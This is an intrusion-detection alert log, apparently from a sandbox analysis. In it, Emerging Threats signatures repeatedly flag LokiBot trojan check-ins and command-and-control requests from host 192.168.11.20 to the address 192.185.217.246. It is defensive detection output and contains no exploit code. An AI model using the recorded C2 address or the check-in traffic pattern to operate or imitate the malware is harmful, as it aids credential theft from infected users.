                                11/22/21-15:29:24.727798TCP2025381ET TROJAN LokiBot Checkin4980680192.168.11.20192.185.217.246
                                11/22/21-15:29:24.727798TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.11.20192.185.217.246
                                11/22/21-15:29:25.681198TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.11.20192.185.217.246
                                11/22/21-15:29:25.681198TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.11.20192.185.217.246
                                11/22/21-15:29:25.681198TCP2025381ET TROJAN LokiBot Checkin4980780192.168.11.20192.185.217.246
                                11/22/21-15:29:25.681198TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980780192.168.11.20192.185.217.246
                                11/22/21-15:29:26.756023TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.11.20192.185.217.246
                                11/22/21-15:29:26.756023TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.11.20192.185.217.246
                                11/22/21-15:29:26.756023TCP2025381ET TROJAN LokiBot Checkin4980880192.168.11.20192.185.217.246
                                11/22/21-15:29:26.756023TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980880192.168.11.20192.185.217.246
                                11/22/21-15:29:27.791623TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.11.20192.185.217.246
                                11/22/21-15:29:27.791623TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.11.20192.185.217.246
                                11/22/21-15:29:27.791623TCP2025381ET TROJAN LokiBot Checkin4980980192.168.11.20192.185.217.246
                                11/22/21-15:29:27.791623TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980980192.168.11.20192.185.217.246
                                11/22/21-15:29:28.696368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.11.20192.185.217.246
                                11/22/21-15:29:28.696368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.11.20192.185.217.246
                                11/22/21-15:29:28.696368TCP2025381ET TROJAN LokiBot Checkin4981080192.168.11.20192.185.217.246
                                11/22/21-15:29:28.696368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981080192.168.11.20192.185.217.246
                                11/22/21-15:29:29.657840TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.11.20192.185.217.246
                                11/22/21-15:29:29.657840TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.11.20192.185.217.246
                                11/22/21-15:29:29.657840TCP2025381ET TROJAN LokiBot Checkin4981180192.168.11.20192.185.217.246
                                11/22/21-15:29:29.657840TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.11.20192.185.217.246
                                11/22/21-15:29:30.622632TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.11.20192.185.217.246
                                11/22/21-15:29:30.622632TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.11.20192.185.217.246
                                11/22/21-15:29:30.622632TCP2025381ET TROJAN LokiBot Checkin4981280192.168.11.20192.185.217.246
                                11/22/21-15:29:30.622632TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981280192.168.11.20192.185.217.246
                                11/22/21-15:29:31.575960TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.11.20192.185.217.246
                                11/22/21-15:29:31.575960TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.11.20192.185.217.246
                                11/22/21-15:29:31.575960TCP2025381ET TROJAN LokiBot Checkin4981380192.168.11.20192.185.217.246
                                11/22/21-15:29:31.575960TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981380192.168.11.20192.185.217.246
                                11/22/21-15:29:32.498086TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.11.20192.185.217.246
                                11/22/21-15:29:32.498086TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.11.20192.185.217.246
                                11/22/21-15:29:32.498086TCP2025381ET TROJAN LokiBot Checkin4981480192.168.11.20192.185.217.246
                                11/22/21-15:29:32.498086TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981480192.168.11.20192.185.217.246
                                11/22/21-15:29:33.425504TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.11.20192.185.217.246
                                11/22/21-15:29:33.425504TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.11.20192.185.217.246
                                11/22/21-15:29:33.425504TCP2025381ET TROJAN LokiBot Checkin4981580192.168.11.20192.185.217.246
                                11/22/21-15:29:33.425504TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981580192.168.11.20192.185.217.246
                                11/22/21-15:29:34.289947TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.11.20192.185.217.246
                                11/22/21-15:29:34.289947TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.11.20192.185.217.246
                                11/22/21-15:29:34.289947TCP2025381ET TROJAN LokiBot Checkin4981680192.168.11.20192.185.217.246
                                11/22/21-15:29:34.289947TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981680192.168.11.20192.185.217.246
                                11/22/21-15:29:35.268440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.11.20192.185.217.246
                                11/22/21-15:29:35.268440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.11.20192.185.217.246
                                11/22/21-15:29:35.268440TCP2025381ET TROJAN LokiBot Checkin4981780192.168.11.20192.185.217.246
                                11/22/21-15:29:35.268440TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.11.20192.185.217.246
                                11/22/21-15:29:36.276251TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.11.20192.185.217.246
                                11/22/21-15:29:36.276251TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.11.20192.185.217.246
                                11/22/21-15:29:36.276251TCP2025381ET TROJAN LokiBot Checkin4981880192.168.11.20192.185.217.246
                                11/22/21-15:29:36.276251TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981880192.168.11.20192.185.217.246
                                11/22/21-15:29:37.248907TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.11.20192.185.217.246
                                11/22/21-15:30:28.763539TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.11.20192.185.217.246
                                11/22/21-15:30:28.763539TCP2025381ET TROJAN LokiBot Checkin4988180192.168.11.20192.185.217.246
                                11/22/21-15:30:28.763539TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988180192.168.11.20192.185.217.246
                                11/22/21-15:30:29.603702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988280192.168.11.20192.185.217.246
                                11/22/21-15:30:29.603702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988280192.168.11.20192.185.217.246
                                11/22/21-15:30:29.603702TCP2025381ET TROJAN LokiBot Checkin4988280192.168.11.20192.185.217.246
                                11/22/21-15:30:29.603702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988280192.168.11.20192.185.217.246
                                11/22/21-15:30:30.360789TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.11.20192.185.217.246
                                11/22/21-15:30:30.360789TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.11.20192.185.217.246
                                11/22/21-15:30:30.360789TCP2025381ET TROJAN LokiBot Checkin4988380192.168.11.20192.185.217.246
                                11/22/21-15:30:30.360789TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.11.20192.185.217.246
                                11/22/21-15:30:31.152874TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.11.20192.185.217.246
                                11/22/21-15:30:31.152874TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988480192.168.11.20192.185.217.246
                                11/22/21-15:30:31.152874TCP2025381ET TROJAN LokiBot Checkin4988480192.168.11.20192.185.217.246
                                11/22/21-15:30:31.152874TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.11.20192.185.217.246
                                11/22/21-15:30:31.986242TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.11.20192.185.217.246
                                11/22/21-15:30:31.986242TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.11.20192.185.217.246
                                11/22/21-15:30:31.986242TCP2025381ET TROJAN LokiBot Checkin4988580192.168.11.20192.185.217.246
                                11/22/21-15:30:31.986242TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.11.20192.185.217.246
                                11/22/21-15:30:32.814175TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988680192.168.11.20192.185.217.246
                                11/22/21-15:30:32.814175TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988680192.168.11.20192.185.217.246
                                11/22/21-15:30:32.814175TCP2025381ET TROJAN LokiBot Checkin4988680192.168.11.20192.185.217.246
                                11/22/21-15:30:32.814175TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988680192.168.11.20192.185.217.246
                                11/22/21-15:30:33.653054TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.11.20192.185.217.246
                                11/22/21-15:30:33.653054TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988780192.168.11.20192.185.217.246
                                11/22/21-15:30:33.653054TCP2025381ET TROJAN LokiBot Checkin4988780192.168.11.20192.185.217.246
                                11/22/21-15:30:33.653054TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988780192.168.11.20192.185.217.246
                                11/22/21-15:30:34.484906TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988880192.168.11.20192.185.217.246
                                11/22/21-15:30:34.484906TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.11.20192.185.217.246
                                11/22/21-15:30:34.484906TCP2025381ET TROJAN LokiBot Checkin4988880192.168.11.20192.185.217.246
                                11/22/21-15:30:34.484906TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988880192.168.11.20192.185.217.246
                                11/22/21-15:30:35.257781TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988980192.168.11.20192.185.217.246
                                11/22/21-15:30:35.257781TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988980192.168.11.20192.185.217.246
                                11/22/21-15:30:35.257781TCP2025381ET TROJAN LokiBot Checkin4988980192.168.11.20192.185.217.246
                                11/22/21-15:30:35.257781TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988980192.168.11.20192.185.217.246
                                11/22/21-15:30:36.072707TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.11.20192.185.217.246
                                11/22/21-15:30:36.072707TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.11.20192.185.217.246
                                11/22/21-15:30:36.072707TCP2025381ET TROJAN LokiBot Checkin4989080192.168.11.20192.185.217.246
                                11/22/21-15:30:36.072707TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.11.20192.185.217.246
                                11/22/21-15:30:36.892300TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989180192.168.11.20192.185.217.246
                                11/22/21-15:30:36.892300TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989180192.168.11.20192.185.217.246
                                11/22/21-15:30:36.892300TCP2025381ET TROJAN LokiBot Checkin4989180192.168.11.20192.185.217.246
                                11/22/21-15:30:36.892300TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989180192.168.11.20192.185.217.246
                                11/22/21-15:30:37.679101TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.11.20192.185.217.246
                                11/22/21-15:30:37.679101TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.11.20192.185.217.246
                                11/22/21-15:30:37.679101TCP2025381ET TROJAN LokiBot Checkin4989280192.168.11.20192.185.217.246
                                11/22/21-15:30:37.679101TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.11.20192.185.217.246
                                11/22/21-15:30:38.483832TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989380192.168.11.20192.185.217.246
                                11/22/21-15:30:38.483832TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989380192.168.11.20192.185.217.246
                                11/22/21-15:30:38.483832TCP2025381ET TROJAN LokiBot Checkin4989380192.168.11.20192.185.217.246
                                11/22/21-15:30:38.483832TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989380192.168.11.20192.185.217.246
                                11/22/21-15:30:39.278523TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989480192.168.11.20192.185.217.246
                                11/22/21-15:30:39.278523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989480192.168.11.20192.185.217.246
                                11/22/21-15:30:39.278523TCP2025381ET TROJAN LokiBot Checkin4989480192.168.11.20192.185.217.246
                                11/22/21-15:30:39.278523TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989480192.168.11.20192.185.217.246
                                11/22/21-15:30:40.138028TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.11.20192.185.217.246
                                11/22/21-15:30:40.138028TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989580192.168.11.20192.185.217.246
                                11/22/21-15:30:40.138028TCP2025381ET TROJAN LokiBot Checkin4989580192.168.11.20192.185.217.246
                                11/22/21-15:30:40.138028TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.11.20192.185.217.246
                                11/22/21-15:30:40.949547TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989680192.168.11.20192.185.217.246
                                11/22/21-15:30:40.949547TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989680192.168.11.20192.185.217.246
                                11/22/21-15:30:40.949547TCP2025381ET TROJAN LokiBot Checkin4989680192.168.11.20192.185.217.246
                                11/22/21-15:30:40.949547TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989680192.168.11.20192.185.217.246
                                11/22/21-15:30:41.762238TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989780192.168.11.20192.185.217.246
                                11/22/21-15:30:41.762238TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989780192.168.11.20192.185.217.246
                                11/22/21-15:30:41.762238TCP2025381ET TROJAN LokiBot Checkin4989780192.168.11.20192.185.217.246
                                11/22/21-15:30:41.762238TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989780192.168.11.20192.185.217.246
                                11/22/21-15:30:42.578249TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989880192.168.11.20192.185.217.246
                                11/22/21-15:30:42.578249TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989880192.168.11.20192.185.217.246
                                11/22/21-15:30:42.578249TCP2025381ET TROJAN LokiBot Checkin4989880192.168.11.20192.185.217.246
                                11/22/21-15:30:42.578249TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989880192.168.11.20192.185.217.246
                                11/22/21-15:30:43.381756TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989980192.168.11.20192.185.217.246
                                11/22/21-15:30:43.381756TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989980192.168.11.20192.185.217.246
                                11/22/21-15:30:43.381756TCP2025381ET TROJAN LokiBot Checkin4989980192.168.11.20192.185.217.246
                                11/22/21-15:30:43.381756TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989980192.168.11.20192.185.217.246
                                11/22/21-15:30:44.218963TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990080192.168.11.20192.185.217.246
                                11/22/21-15:30:44.218963TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990080192.168.11.20192.185.217.246
                                11/22/21-15:30:44.218963TCP2025381ET TROJAN LokiBot Checkin4990080192.168.11.20192.185.217.246
                                11/22/21-15:30:44.218963TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990080192.168.11.20192.185.217.246
                                11/22/21-15:30:45.034367TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990180192.168.11.20192.185.217.246
                                11/22/21-15:30:45.034367TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990180192.168.11.20192.185.217.246
                                11/22/21-15:30:45.034367TCP2025381ET TROJAN LokiBot Checkin4990180192.168.11.20192.185.217.246
                                11/22/21-15:30:45.034367TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990180192.168.11.20192.185.217.246
                                11/22/21-15:30:45.778060TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990280192.168.11.20192.185.217.246
                                11/22/21-15:30:45.778060TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990280192.168.11.20192.185.217.246
                                11/22/21-15:30:45.778060TCP2025381ET TROJAN LokiBot Checkin4990280192.168.11.20192.185.217.246
                                11/22/21-15:30:45.778060TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990280192.168.11.20192.185.217.246
                                11/22/21-15:30:46.606665TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990380192.168.11.20192.185.217.246
                                11/22/21-15:30:46.606665TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990380192.168.11.20192.185.217.246
                                11/22/21-15:30:46.606665TCP2025381ET TROJAN LokiBot Checkin4990380192.168.11.20192.185.217.246
                                11/22/21-15:30:46.606665TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990380192.168.11.20192.185.217.246
                                11/22/21-15:30:47.407187TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990480192.168.11.20192.185.217.246
                                11/22/21-15:30:47.407187TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990480192.168.11.20192.185.217.246
                                11/22/21-15:30:47.407187TCP2025381ET TROJAN LokiBot Checkin4990480192.168.11.20192.185.217.246
                                11/22/21-15:30:47.407187TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990480192.168.11.20192.185.217.246
                                11/22/21-15:30:48.257840TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990580192.168.11.20192.185.217.246
                                11/22/21-15:30:48.257840TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990580192.168.11.20192.185.217.246
                                11/22/21-15:30:48.257840TCP2025381ET TROJAN LokiBot Checkin4990580192.168.11.20192.185.217.246
                                11/22/21-15:30:48.257840TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990580192.168.11.20192.185.217.246
                                11/22/21-15:30:49.100544TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990680192.168.11.20192.185.217.246
                                11/22/21-15:30:49.100544TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990680192.168.11.20192.185.217.246
                                11/22/21-15:30:49.100544TCP2025381ET TROJAN LokiBot Checkin4990680192.168.11.20192.185.217.246
                                11/22/21-15:30:49.100544TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990680192.168.11.20192.185.217.246
                                11/22/21-15:30:49.919143TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990780192.168.11.20192.185.217.246
                                11/22/21-15:30:49.919143TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990780192.168.11.20192.185.217.246
                                11/22/21-15:30:49.919143TCP2025381ET TROJAN LokiBot Checkin4990780192.168.11.20192.185.217.246
                                11/22/21-15:30:49.919143TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990780192.168.11.20192.185.217.246
                                11/22/21-15:30:50.748880TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990880192.168.11.20192.185.217.246
                                11/22/21-15:30:50.748880TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990880192.168.11.20192.185.217.246
                                11/22/21-15:30:50.748880TCP2025381ET TROJAN LokiBot Checkin4990880192.168.11.20192.185.217.246
                                11/22/21-15:30:50.748880TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990880192.168.11.20192.185.217.246
                                11/22/21-15:30:51.545084TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14990980192.168.11.20192.185.217.246
                                11/22/21-15:30:51.545084TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990980192.168.11.20192.185.217.246
                                11/22/21-15:30:51.545084TCP2025381ET TROJAN LokiBot Checkin4990980192.168.11.20192.185.217.246
                                11/22/21-15:30:51.545084TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24990980192.168.11.20192.185.217.246
                                11/22/21-15:30:52.363068TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991080192.168.11.20192.185.217.246
                                11/22/21-15:30:52.363068TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991080192.168.11.20192.185.217.246
                                11/22/21-15:30:52.363068TCP2025381ET TROJAN LokiBot Checkin4991080192.168.11.20192.185.217.246
                                11/22/21-15:30:52.363068TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991080192.168.11.20192.185.217.246
                                11/22/21-15:30:53.201243TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991180192.168.11.20192.185.217.246
                                11/22/21-15:30:53.201243TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991180192.168.11.20192.185.217.246
                                11/22/21-15:30:53.201243TCP2025381ET TROJAN LokiBot Checkin4991180192.168.11.20192.185.217.246
                                11/22/21-15:30:53.201243TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991180192.168.11.20192.185.217.246
                                11/22/21-15:30:54.030284TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991280192.168.11.20192.185.217.246
                                11/22/21-15:30:54.030284TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991280192.168.11.20192.185.217.246
                                11/22/21-15:30:54.030284TCP2025381ET TROJAN LokiBot Checkin4991280192.168.11.20192.185.217.246
                                11/22/21-15:30:54.030284TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991280192.168.11.20192.185.217.246
                                11/22/21-15:30:54.917533TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991380192.168.11.20192.185.217.246
                                11/22/21-15:30:54.917533TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991380192.168.11.20192.185.217.246
                                11/22/21-15:30:54.917533TCP2025381ET TROJAN LokiBot Checkin4991380192.168.11.20192.185.217.246
                                11/22/21-15:30:54.917533TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991380192.168.11.20192.185.217.246
                                11/22/21-15:30:55.831638TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991480192.168.11.20192.185.217.246
                                11/22/21-15:30:55.831638TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991480192.168.11.20192.185.217.246
                                11/22/21-15:30:55.831638TCP2025381ET TROJAN LokiBot Checkin4991480192.168.11.20192.185.217.246
                                11/22/21-15:30:55.831638TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991480192.168.11.20192.185.217.246
                                11/22/21-15:30:56.709385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991580192.168.11.20192.185.217.246
                                11/22/21-15:30:56.709385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991580192.168.11.20192.185.217.246
                                11/22/21-15:30:56.709385TCP2025381ET TROJAN LokiBot Checkin4991580192.168.11.20192.185.217.246
                                11/22/21-15:30:56.709385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991580192.168.11.20192.185.217.246
                                11/22/21-15:30:57.625578TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991680192.168.11.20192.185.217.246
                                11/22/21-15:30:57.625578TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991680192.168.11.20192.185.217.246
                                11/22/21-15:30:57.625578TCP2025381ET TROJAN LokiBot Checkin4991680192.168.11.20192.185.217.246
                                11/22/21-15:30:57.625578TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991680192.168.11.20192.185.217.246
                                11/22/21-15:30:58.537211TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991780192.168.11.20192.185.217.246
                                11/22/21-15:30:58.537211TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991780192.168.11.20192.185.217.246
                                11/22/21-15:30:58.537211TCP2025381ET TROJAN LokiBot Checkin4991780192.168.11.20192.185.217.246
                                11/22/21-15:30:58.537211TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991780192.168.11.20192.185.217.246
                                11/22/21-15:30:59.321312TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991880192.168.11.20192.185.217.246
                                11/22/21-15:30:59.321312TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991880192.168.11.20192.185.217.246
                                11/22/21-15:30:59.321312TCP2025381ET TROJAN LokiBot Checkin4991880192.168.11.20192.185.217.246
                                11/22/21-15:30:59.321312TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991880192.168.11.20192.185.217.246
                                11/22/21-15:31:00.146852TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991980192.168.11.20192.185.217.246
                                11/22/21-15:31:00.146852TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991980192.168.11.20192.185.217.246
                                11/22/21-15:31:00.146852TCP2025381ET TROJAN LokiBot Checkin4991980192.168.11.20192.185.217.246
                                11/22/21-15:31:00.146852TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991980192.168.11.20192.185.217.246
                                11/22/21-15:31:00.984880TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992080192.168.11.20192.185.217.246
                                11/22/21-15:31:00.984880TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992080192.168.11.20192.185.217.246
                                11/22/21-15:31:00.984880TCP2025381ET TROJAN LokiBot Checkin4992080192.168.11.20192.185.217.246
                                11/22/21-15:31:00.984880TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992080192.168.11.20192.185.217.246
                                11/22/21-15:31:01.775019TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992180192.168.11.20192.185.217.246
                                11/22/21-15:31:01.775019TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992180192.168.11.20192.185.217.246
                                11/22/21-15:31:01.775019TCP2025381ET TROJAN LokiBot Checkin4992180192.168.11.20192.185.217.246
                                11/22/21-15:31:01.775019TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992180192.168.11.20192.185.217.246
                                11/22/21-15:31:02.685668TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992280192.168.11.20192.185.217.246
                                11/22/21-15:31:02.685668TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992280192.168.11.20192.185.217.246
                                11/22/21-15:31:02.685668TCP2025381ET TROJAN LokiBot Checkin4992280192.168.11.20192.185.217.246
                                11/22/21-15:31:02.685668TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992280192.168.11.20192.185.217.246
                                11/22/21-15:31:03.613139TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992380192.168.11.20192.185.217.246
                                11/22/21-15:31:03.613139TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992380192.168.11.20192.185.217.246
                                11/22/21-15:31:03.613139TCP2025381ET TROJAN LokiBot Checkin4992380192.168.11.20192.185.217.246
                                11/22/21-15:31:03.613139TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992380192.168.11.20192.185.217.246
                                11/22/21-15:31:04.405362TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992480192.168.11.20192.185.217.246
                                11/22/21-15:31:04.405362TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992480192.168.11.20192.185.217.246
                                11/22/21-15:31:04.405362TCP2025381ET TROJAN LokiBot Checkin4992480192.168.11.20192.185.217.246
                                11/22/21-15:31:04.405362TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992480192.168.11.20192.185.217.246
                                11/22/21-15:31:05.235241TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992580192.168.11.20192.185.217.246
                                11/22/21-15:31:05.235241TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992580192.168.11.20192.185.217.246
                                11/22/21-15:31:05.235241TCP2025381ET TROJAN LokiBot Checkin4992580192.168.11.20192.185.217.246
                                11/22/21-15:31:05.235241TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992580192.168.11.20192.185.217.246
                                11/22/21-15:31:06.090021TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992680192.168.11.20192.185.217.246
                                11/22/21-15:31:06.090021TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992680192.168.11.20192.185.217.246
                                11/22/21-15:31:06.090021TCP2025381ET TROJAN LokiBot Checkin4992680192.168.11.20192.185.217.246
                                11/22/21-15:31:06.090021TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992680192.168.11.20192.185.217.246
                                11/22/21-15:31:06.917649TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992780192.168.11.20192.185.217.246
                                11/22/21-15:31:06.917649TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992780192.168.11.20192.185.217.246
                                11/22/21-15:31:06.917649TCP2025381ET TROJAN LokiBot Checkin4992780192.168.11.20192.185.217.246
